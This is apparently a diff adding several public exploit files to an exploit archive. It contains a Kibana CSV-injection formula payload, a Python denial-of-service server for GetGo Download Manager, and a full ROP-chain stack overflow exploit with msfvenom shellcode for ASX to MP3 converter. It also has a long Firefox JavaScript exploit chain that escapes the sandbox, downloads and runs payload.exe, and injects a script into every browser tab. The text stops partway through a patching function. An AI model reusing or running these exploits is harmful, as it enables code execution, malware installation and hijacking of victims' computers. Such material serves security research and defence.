@@ -0,0 +1,38 @@
+# Exploit Title: Kibana 6.6.1 - CSV Injection
+# Google Dork: inurl:"/app/kibana" intitle:"Kibana"
+# Date: 2020-01-15
+# Exploit Author: Aamir Rehman
+# Vendor Homepage: https://www.elastic.co/kibana
+# Software Link: https://www.elastic.co/downloads/
+# Version: v6.6.1 possibly latest versions
+# Tested on: Kibana 6.6.1 - Firefox/Windows
+# References: 
+# https://the-it-wonders.blogspot.com/2020/01/csv-injection-in-kibana-661-possibly.html
+# https://github.com/elastic/kibana/issues/56081
+
+
+# Software description:
+Kibana is an open source data visualization dashboard for Elasticsearch. It provides visualization capabilities on top of the content indexed on an Elasticsearch cluster. Users can create bar, line and scatter plots, or pie charts and maps on top of large volumes of data.
+
+# Technical Details & Impact:
+Most of the kibana applications are having authentication disabled any malicious user can inject csv payload in visualization section of dashboard and It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.
+
+# POC
+
+1.	Click on Dashboard tab and select any dashboard from the list. I would suggest to select the dashboard which has Gauge or Line visualization type.
+2.	Once you are on dashboard click on "Edit button" on top right of the page.
+3.	Click "gear (options)" button of any graphical view box.
+4.	It will open a options box click on "edit visualization".
+5.	It will open the edit page click on any "Blue play button" in front of any metric.
+6.	Here you can edit the metric's information; we will be exploiting the "Custom Label" field
+7.	In custom Label field enter your csv injection payload e.g. @SUM(1+1)*cmd|' /c calc'!A0.
+8.	All is done now click on Top "blue play button" to save the settings and click on SAVE button open top right of the page.
+9.	Go back to dashboard graphical view, you will see your csv payload their. Click on 3dots buttons on top of the graphical box click on "INSPECT".
+10.	It will open the export panel click on download csv and click formatted csv.
+
+# Timeline
+15-01-2020 - Vulnerability discovered
+27-01-2020 - Vendor contacted
+28-01-2020 - Vendor responded, not marking it as a security flaw. Git issue has been created. (https://github.com/elastic/kibana/issues/56081)
+28-01-2020 – Requested vendor for disclosure. 
+29-01-2020 - Full Disclosure
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/47282.txt b/exploits/windows_x86-64/dos/47282.txt
new file mode 100644
index 000000000..b6aefcee5
--- /dev/null
+++ b/exploits/windows_x86-64/dos/47282.txt
@@ -0,0 +1,39 @@
+# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
+# Date: 2019-08-15
+# Author - Malav Vyas
+# Vulnerable Software: GetGo Download Manager 6.2.2.3300
+# Vendor Home Page: www.getgosoft.com
+# Software Link: http://www.getgosoft.com/getgodm/
+# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
+# Attack Type : Remote
+# Impact : DoS
+# Co-author - Velayuthm Selvaraj
+
+# 1. Description
+# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and 
+# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.
+
+# 2. Proof of Concept
+
+import socket
+from time import sleep
+host = "192.168.0.112"
+port = 80
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.bind((host, port))
+sock.listen(1)
+print "\n[+] Listening on %d ..." % port
+
+cl, addr = sock.accept()
+print "[+] Connected to %s" % addr[0]
+evilbuffer = "A" * 6000
+    
+buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"
+
+print cl.recv(1000)
+cl.send(buffer)
+print "[+] Sending buffer: OK\n"
+
+sleep(30)
+cl.close()
+sock.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/47468.py b/exploits/windows_x86-64/local/47468.py
new file mode 100755
index 000000000..3714d019f
--- /dev/null
+++ b/exploits/windows_x86-64/local/47468.py
@@ -0,0 +1,114 @@
+# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
+# Google Dork: N/A
+# Date: 2019-10-06
+# Exploit Author: max7253
+# Vendor Homepage: http://www.mini-stream.net/
+# Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe
+# Version: 3.1.3.7.2010.11.05
+# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
+# CVE : N/A
+
+# Note: There is a similar exploit published but it doesn't work in the OS I used:
+# https://www.exploit-db.com/exploits/42963
+# This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on.
+
+
+import struct
+file = 'fuzz_rop.asx'
+#Tested on
+#OS Name:                   Microsoft Windows 7 Enterprise
+#OS Version:                6.1.7601 Service Pack 1 Build 7601
+#System Type:               x64-based PC
+
+#msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python
+buf =  b""
+buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29"
+buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28"
+buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35"
+buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b"
+buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6"
+buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc"
+buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04"
+buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49"
+buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1"
+buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b"
+buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86"
+buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17"
+buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2"
+buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40"
+buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c"
+buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49"
+buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc"
+
+payload = "http://"
+payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC"
+
+## Save allocation type (0x1000) in EDX
+payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
+payload += struct.pack('<L', 0x11111111)
+payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
+payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
+payload += struct.pack('<L', 0xEEEEFEEF)
+payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
+payload += struct.pack('<L', 0x41414141)
+
+## Save the address of VirtualAlloc() in ESI
+payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll] 
+payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
+payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
+payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
+payload += struct.pack('<L', 0x41414141)
+payload += struct.pack('<L', 0x41414141)
+
+## Save the size of the block in EBX
+payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
+
+## Save the address of (# ADD ESP,8 # RETN) in EBP
+payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
+payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
+#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
+
+## Save memory protection code (0x40) in ECX
+payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN
+payload += struct.pack('<L', 0xFFFFFFFF)
+payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
+payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
+payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
+
+## Save ROP-NOP in EDI
+payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
+payload += struct.pack('<L', 0x1002D038) # RETN
+
+## Save NOPs in EAX
+#payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll] 
+#payload += struct.pack('<L', 0x90909090) # nop
+
+## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
+payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
+payload += struct.pack('<L', 0xA4E2F275)
+payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
+payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN
+
+payload += "\x90" * 4
+payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
+payload += "\x90" * 20
+payload += buf
+
+f = open(file,'w')
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/47685.txt b/exploits/windows_x86-64/local/47685.txt
new file mode 100644
index 000000000..ad4a9cb0c
--- /dev/null
+++ b/exploits/windows_x86-64/local/47685.txt
@@ -0,0 +1 @@
+EDB Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47685.zip
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/47752.js b/exploits/windows_x86-64/local/47752.js
new file mode 100644
index 000000000..de8e33850
--- /dev/null
+++ b/exploits/windows_x86-64/local/47752.js
@@ -0,0 +1,738 @@
+// Axel '0vercl0k' Souchet - November 19 2019
+
+// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip
+
+// 0:000> ? xul!sAutomationPrefIsSet - xul
+// Evaluate expression: 85724947 = 00000000`051c0f13
+const XulsAutomationPrefIsSet = 0x051c0f13n;
+// 0:000> ? xul!disabledForTest - xul
+// Evaluate expression: 85400792 = 00000000`05171cd8
+const XuldisabledForTest = 0x05171cd8n;
+
+const Debug = false;
+const dbg = p => {
+    if(Debug == false) {
+        return;
+    }
+
+    print(`Debug: ${p}`);
+};
+
+const ArraySize = 0x5;
+const WantedArraySize = 0x42424242;
+
+let arr = null;
+let Trigger = false;
+const Spray = [];
+
+function f(Special, Idx, Value) {
+    arr[Idx] = 0x41414141;
+    Special.slice();
+    arr[Idx] = Value;
+}
+
+class SoSpecial extends Array {
+    static get [Symbol.species]() {
+        return function() {
+            if(!Trigger) {
+                return;
+            }
+
+            arr.length = 0;
+            for(let i = 0; i < 0x40000; i++) {
+                Spray.push(new Uint32Array(ArraySize));
+            }
+        };
+    }
+};
+
+function GetMeBiggie() {
+    for(let Idx = 0; Idx < 0x100000; Idx++) {
+        Spray.push(new Uint32Array(ArraySize));
+    }
+
+    const SpecialSnowFlake = new SoSpecial();
+    for(let Idx = 0; Idx < 10; Idx++) {
+        arr = new Array(0x7e);
+        Trigger = false;
+        for(let Idx = 0; Idx < 0x400; Idx++) {
+            f(SpecialSnowFlake, 0x70, Idx);
+        }
+
+        Trigger = true;
+        f(SpecialSnowFlake, 47, WantedArraySize);
+        if(arr.length != 0) {
+            continue;
+        }
+
+        const Biggie = Spray.find(e => e.length != ArraySize);
+        if(Biggie != null) {
+            return Biggie;
+        }
+    }
+
+    return null;
+}
+
+function ExploitCVE_2019_9810() {
+    print = console.log;
+
+    const Biggie = GetMeBiggie();
+    if(Biggie == null || Biggie.length != WantedArraySize) {
+        dbg('Failed to set things up :(.');
+        return false;
+    }
+
+    //
+    // Scan for one of the Uint32Array we sprayed earlier.
+    //
+
+    let Biggie2AdjacentSize = null;
+    const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);
+    for(let Idx = 0; Idx < 0x100; Idx++) {
+        const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);
+        if(Qword == JSValueArraySize) {
+            Biggie2AdjacentSize = Idx + 1;
+            break;
+        }
+    }
+
+    if(Biggie2AdjacentSize == null) {
+        dbg('Failed to find an adjacent array :(.');
+        return false;
+    }
+
+    //
+    // Use the array length as a marker.
+    //
+
+    const AdjacentArraySize = 0xbbccdd;
+    Biggie[Biggie2AdjacentSize] = AdjacentArraySize;
+
+    //
+    // Find the array now..
+    //
+
+    const AdjacentArray = Spray.find(
+        e => e.length == AdjacentArraySize
+    );
+
+    if(AdjacentArray == null) {
+        dbg('Failed to find the corrupted adjacent array :(.');
+        return false;
+    }
+
+    const ReadPtr = Addr => {
+        const SizeInDwords = 2;
+        const SavedSlot = [
+            Biggie[Biggie2AdjacentSize],
+            Biggie[Biggie2AdjacentSize + 2 + 2],
+            Biggie[Biggie2AdjacentSize + 2 + 2 + 1]
+        ];
+
+        //
+        // Corrupt the `AdjacentArray`'s size / data slot.
+        //
+
+        Biggie[Biggie2AdjacentSize] = SizeInDwords;
+        Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);
+        Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);
+
+        //
+        // Read arbitrary location now.
+        //
+
+        const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);
+
+        //
+        // Restore the `AdjacentArray`'s size / data slot.
+        //
+
+        Biggie[Biggie2AdjacentSize] = SavedSlot[0];
+        Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];
+        Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];
+        return Ptr;
+    };
+
+    const WritePtr = (Addr, Value) => {
+        const SizeInDwords = 2;
+        const SavedSlot = [
+            Biggie[Biggie2AdjacentSize],
+            Biggie[Biggie2AdjacentSize + 2 + 2],
+            Biggie[Biggie2AdjacentSize + 2 + 2 + 1]
+        ];
+
+        //
+        // Corrupt the `AdjacentArray`'s size / data slot.
+        //
+
+        Biggie[Biggie2AdjacentSize] = SizeInDwords;
+        Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);
+        Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);
+
+        //
+        // Write to arbitrary location now.
+        //
+
+        AdjacentArray[0] = Number(Value & 0xffffffffn);
+        AdjacentArray[1] = Number(Value >> 32n);
+
+        //
+        // Restore the `AdjacentArray`'s size / data slot.
+        //
+
+        Biggie[Biggie2AdjacentSize] = SavedSlot[0];
+        Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];
+        Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];
+        return true;
+    };
+
+    const AddrOf = Obj => {
+        AdjacentArray.hell_on_earth = Obj;
+        // 0:000> dqs 1ae5716e76a0
+        // 00001ae5`716e76a0  00001ae5`7167dfd0
+        // 00001ae5`716e76a8  000010c5`8e73c6a0
+        // 00001ae5`716e76b0  00000238`9334e790
+        // 00001ae5`716e76b8  00007ff6`6be55010 js!emptyElementsHeader+0x10
+        // 00001ae5`716e76c0  fffa0000`00000000
+        // 00001ae5`716e76c8  fff88000`00bbccdd
+        // 0:000> !telescope 0x00002389334e790
+        // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)
+        const SlotOffset = Biggie2AdjacentSize - (3 * 2);
+        const SlotsAddress = BigInt.fromUint32s(
+            Biggie.slice(SlotOffset, SlotOffset + 2)
+        );
+
+        return BigInt.fromJSValue(ReadPtr(SlotsAddress));
+    };
+
+    //
+    // Let's move the battle field to the TenuredHeap
+    //
+
+    const ArrayBufferLength = 10;
+    const AB1 = new ArrayBuffer(ArrayBufferLength);
+    const AB2 = new ArrayBuffer(ArrayBufferLength);
+    const AB1Address = AddrOf(AB1);
+    const AB2Address = AddrOf(AB2);
+
+    dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);
+    dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);
+    WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);
+    WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);
+
+    if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {
+        dbg('Corrupting the ArrayBuffers failed :(.');
+        return false;
+    }
+
+    const Primitives = BuildPrimitives(AB1, AB2);
+    Math.atan2(AB2);
+
+    //
+    // All right, time to clean up behind ourselves.
+    // Let's fix AdjacentArray's size first (as we are using Biggie to do it).
+    //
+
+    Biggie[Biggie2AdjacentSize] = ArraySize;
+
+    //
+    // Let's fix Biggie's length as we are done with it.
+    // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580
+    // Detected xul.dll, using it as js module.
+    // 11e6fa2f7580: js!js::TypedArrayObject:       Type: Uint32Array
+    // 11e6fa2f7580: js!js::TypedArrayObject:     Length: 1337
+    // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348
+    // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0
+    // 11e6fa2f7580: js!js::TypedArrayObject:    Content: Uint32Array({Length:1337, ...})
+    // @$smdump_jsvalue(0xfffe11e6fa2f7580)
+    //
+    // 0:000> !telescope 0x11e6fa2f7580
+    // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))
+    // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))
+    // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)
+    // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)
+    // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)
+    // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)
+    //
+
+    const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;
+    Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));
+
+    //
+    // From there, we're kinda done - let's get god mode and fuck off.
+    //
+
+    GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);
+    return true;
+}
+
+//
+// This function uses a `Sandbox` with a `System Principal` to be able to grab the
+// `docShell` object off the `window` object. Once it has it, it can grab the frame
+// `messageManager` that we need to trigger the sandbox escape.
+//
+
+function GetContentFrameMessageManager(Win) {
+    function _GetDocShellFromWindow(Win) {
+        return Win.docShell;
+    }
+
+    const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');
+    const Cu = Components.utils;
+    const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());
+    const Code = _GetDocShellFromWindow.toSource();
+    Cu.evalInSandbox(Code, Sbx);
+    const DocShell = Sbx._GetDocShellFromWindow(Win);
+    Cu.nukeSandbox(Sbx);
+    return DocShell.messageManager;
+}
+
+//
+// This function sends a 'Prompt:Open' message over the frame message manager IPC,
+// with an URI.
+//
+
+function PromptOpen(Uri) {
+    const FrameMM = GetContentFrameMessageManager(window);
+    const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });
+    return Result;
+}
+
+//
+// This is the function that abuses the `Prompt:Open` message to re-exploit the parent
+// process and escape the sandbox.
+//
+
+function TriggerCVE_2019_11708() {
+    PromptOpen(`${location.origin}?stage3`);
+}
+
+//
+// This is the function that gets written into the frame script the exploit drops
+// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a
+// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:
+//   Services.mm.loadFrameScript('file://frame-script.js', true)
+// This should break in the `Browser Content Toolbox` debugger window.
+//
+
+function FrameScriptPayload() {
+    function PimpMyDocument() {
+
+        //
+        // Don't infect doar-e and leave Cthulhu alone...
+        //
+
+        if(content.document.location.origin == 'https://doar-e.github.io' ||
+           content.document.location.origin == 'http://localhost:8000') {
+            return;
+        }
+
+        //
+        // .. as well as don't play with non http origins (I've seen empty/null origins).
+        //
+
+        if(!content.document.location.origin.startsWith('http')) {
+            return;
+        }
+
+        //
+        // Time to party! Let's find every `A` tag and make them point to doar-e.
+        // We also use this opportunity to make every `backgroundImage` / `backgroundColor`
+        // style attributes to `none` / `transparent` to not hide the doar-e background.
+        //
+
+        for(const Node of content.document.getElementsByTagName('*')) {
+            if(Node.tagName == 'A') {
+                Node.href = 'https://doar-e.github.io/';
+                continue;
+            }
+
+            Node.style.backgroundImage = 'none';
+            Node.style.backgroundColor = 'transparent';
+        }
+
+        //
+        // Change the background.
+        //
+
+        content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';
+    }
+
+    //
+    // First we set an event handler to make sure to be invoked when a new `content`
+    // is created. Keep in mind that we basically have ~three cases to handle:
+    //  1/ We are getting injected in an already existing tab,
+    //  2/ We are getting injected in a new tab,
+    //  3/ A user clicks on a link and a new `content` gets created.
+    // We basically want to have control over those three events. The below ensures
+    // we get a chance to execute code for 2/.
+    //
+
+    addEventListener('DOMWindowCreated', FrameScriptPayload);
+    dump(`Hello from: ${content.location.origin}\n`);
+
+    if(content.document != null && content.document.body != null) {
+
+        //
+        // Either the tab already existed in which case we already have a document which we
+        // can play with...
+        //
+
+        PimpMyDocument();
+        return;
+    }
+
+    //
+    // ..Or it doesn't exist quite yet and we want to get a callback when it does.
+    //
+
+    content.addEventListener('load', PimpMyDocument);
+}
+
+//
+// This function drops a file (open + write + close) using the OSFile JS module.
+//
+
+function DropFile(Path, Content) {
+
+    //
+    // We expect either a string or a TypedArray.
+    //
+
+    const Encoder = new TextEncoder();
+    const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;
+    return OS.File.open(Path, {write: true, truncate: true})
+    .then(File => {
+        return Promise.all([
+            // We return the File object in order to be able to use it in the
+            // next `.then`. This allows us to chain the `write` and the `close`
+            // without another level of deepness.
+            File,
+            File.write(ContentBuffer),
+        ]);
+    })
+    .then((Results) => {
+        const [File, _WrittenBytes] = Results;
+        return File.close();
+    });
+}
+
+//
+// This function drops / executes a payload binary, as well as inject a frame script
+// into every tabs.
+//
+
+function Payload() {
+
+    //
+    // Import a bunch of JS modules we will be using later.
+    //
+
+    const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');
+    const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');
+
+    //
+    // First order of business, we create a first promise that downloads the payload
+    // (aka Slime Shady), drops it in the profile directory and finally executes it.
+    //
+
+    const Dir = OS.Constants.Path.localProfileDir;
+    const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');
+    const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)
+    .then((Response) => {
+
+        //
+        // We return the result as a TypedArray as this is what `DropFile`
+        // expects for binary content.
+        //
+
+        return Response.arrayBuffer();
+    })
+    .then((Content) => {
+
+        //
+        // Time to drop the file now. Note that we return the promise so
+        // the next `then` executes when the file has been successfully dropped.
+        //
+
+        dbg(`Payload downloaded.`);
+        return DropFile(PayloadPath, new Uint8Array(Content));
+    })
+    .then(() => {
+
+        //
+        // At this point, we are ready to spawn the payload, let's do it!
+        //
+
+        dbg(`Creating the process.. ${PayloadPath}`);
+        CreateProcessA(PayloadPath);
+    })
+    .catch(Ex => {
+        console.log(`Exception in payload promise: ${Ex}`);
+    });
+
+    //
+    // Second order of business is to backdoor the tabs. To do so, we drop a frame
+    // script that we inject into every tabs.
+    //
+
+    const FramePayloadContent = `${FrameScriptPayload.toSource()}
+
+FrameScriptPayload();`;
+    const ScriptPath = OS.Path.join(Dir, 'frame-script.js');
+    const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)
+    .then(() => {
+
+        //
+        // At this time we are ready to inject the frame script into the tabs.
+        // Note that we need to drop the file locally / use the file:// scheme
+        // so that the tabs accept to interpret the file (unfortunately,
+        // remote ones are ignored).
+        //
+
+        dbg(`About to loadFrameScript: ${ScriptPath}`);
+        Services.mm.loadFrameScript(`file://${ScriptPath}`, true);
+    })
+    .catch(Ex => {
+        console.log(`Exception in frame payload promise: ${Ex}`);
+    });
+
+
+    //
+    // Last but not least, we set up code to execute on completion of both the above
+    // promises. You have to remember that at this point the modal window is still open
+    // and blocks navigation / UI interaction, so we need to close it as soon as we can
+    // to be as stealth as possible.
+    // Just for kicks, we spawn a calculator when we're done because why not.
+    //
+
+    Promise.all([PayloadPromise, FramePayloadPromise])
+    .then(() => {
+
+        //
+        // .. just for kicks.
+        //
+
+        CreateProcessA('c:\\windows\\system32\\calc.exe');
+
+        //
+        // Phew, we made it here let's close the window :).
+        //
+
+        window.close();
+    })
+    .catch(Ex => {
+        console.log(`Exception in clean up promise: ${Ex}`);
+        window.close();
+    });
+}
+
+//
+// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()
+// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have
+// god mode. It's far from being the cleanest way, but this is the easiest way I found.
+//
+//   nsresult nsSocketTransport::InitiateSocket() {
+//       SOCKET_LOG(("nsSocketTransport::InitiateSocket [this=%p]\n", this));
+//       nsresult rv;
+//       bool isLocal;
+//       IsLocal(&isLocal);
+//       if (gIOService->IsNetTearingDown()) {
+//         return NS_ERROR_ABORT;
+//       }
+//       if (gIOService->IsOffline()) {
+//         if (!isLocal) return NS_ERROR_OFFLINE;
+//       } else if (!isLocal) {
+//         if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&
+//             !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {
+//           nsAutoCString ipaddr;
+//           RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);
+//           netaddr->GetAddress(ipaddr);
+//           fprintf_stderr(
+//               stderr,
+//               "FATAL ERROR: Non-local network connections are disabled and a "
+//               "connection "
+//               "attempt to %s (%s) was made.\nYou should only access hostnames "
+//               "available via the test networking proxy (if running mochitests) "
+//               "or from a test-specific httpd.js server (if running xpcshell "
+//               "tests). "
+//               "Browser services should be disabled or redirected to a local "
+//               "server.\n",
+//               mHost.get(), ipaddr.get());
+//           MOZ_CRASH("Attempting to connect to non-local address!");
+//         }
+//       }
+//
+
+function PatchInitiateSocket() {
+
+    //
+    // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket
+    // so that it doesn't assert on us because we turned on testing features.
+    // This is the assert we hit without the patch:
+    //
+    //   FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.
+    //   You should only access hostnames available via the test networking proxy
+    //   (if running mochitests) or from a test-specific httpd.js server (if running
+    //   xpcshell tests). Browser services should be disabled or redirected to a local
+    //   server.
+    //   (4014.82c): Break instruction exception - code 80000003 (first chance)
+    //   xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:
+    //   00007ff9`69a66372 cc              int     3
+    //
+    // Here is the disasembly before:
+    //
+    //   0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6
+    //   xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\mozilla-central\netwerk\base\nsSocketTransport2.cpp @ 1264]:
+    //   00007ff9`3f9c55c6 8b0d0cc7ff04    mov     ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]
+    //   00007ff9`3f9c55cc 83f9ff          cmp     ecx,0FFFFFFFFh
+    //   00007ff9`3f9c55cf 7520            jne     xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)
+    //   00007ff9`3f9c55d1 488d0ddaa3df04  lea     rcx,[xul!`string' (00007ff9`447bf9b2)]
+    //
+    // And after:
+    //
+    //   0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6
+    //   xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\mozilla-central\netwerk\base\nsSocketTransport2.cpp @ 1264]:
+    //   00007ff9`3f9c55c6 90              nop
+    //   00007ff9`3f9c55c7 90              nop
+    //   00007ff9`3f9c55c8 90              nop
+    //   00007ff9`3f9c55c9 4831c9          xor     rcx,rcx
